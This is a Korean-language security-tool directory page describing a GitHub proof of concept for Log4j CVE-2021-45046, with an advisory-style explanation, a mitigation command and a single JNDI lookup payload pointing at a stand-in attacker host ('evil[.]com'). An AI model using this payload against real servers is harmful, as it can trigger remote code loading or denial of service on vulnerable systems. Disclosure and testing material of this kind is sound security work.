Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 권한 상승 -- CVE-2021-45046 | Kitploit
도구/GitHubGitHub/cckuailong/log4j_cve-2021-45046
Vulnerability AnalysisExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 권한 상승 -- CVE-2021-45046

저장소 보기
22784년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Log4j 2.15.0 권한 상승 -- CVE-2021-45046

공격

설명

Apache Log4j 2.15.0에서 CVE-2021-44228을 해결하기 위한 수정이 특정 비기본 설정에서 불완전한 것으로 확인되었습니다. 로깅 구성이 비기본 Pattern Layout과 Context Lookup(예: $${ctx:loginId}) 또는 Thread Context Map 패턴(%X, %mdc, %MDC)을 함께 사용하는 경우, Thread Context Map(MDC) 입력 데이터를 제어할 수 있는 공격자가 JNDI Lookup 패턴을 사용한 악의적인 입력 데이터를 만들어 서비스 거부(DOS) 공격을 유발할 수 있습니다. Log4j 2.15.0은 기본적으로 JNDI LDAP 조회를 localhost로 제한합니다. log4j2.noFormatMsgLookup 시스템 속성을 true로 설정하는 등의 이전 완화 조치는 이 특정 취약점을 완화하지 못한다는 점에 유의하십시오. Log4j 2.16.0은 메시지 조회 패턴 지원을 제거하고 JNDI 기능을 기본적으로 비활성화하여 이 문제를 해결합니다. 이 문제는 이전 릴리스(<2.16.0)에서 classpath에서 JndiLookup 클래스를 제거하여 완화할 수 있습니다(예: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

cvss 3.7 -> 9

Poc

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Log4shell 주제

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

reapoc에 기여를 환영합니다

https://github.com/cckuailong/reapoc

도구 다운로드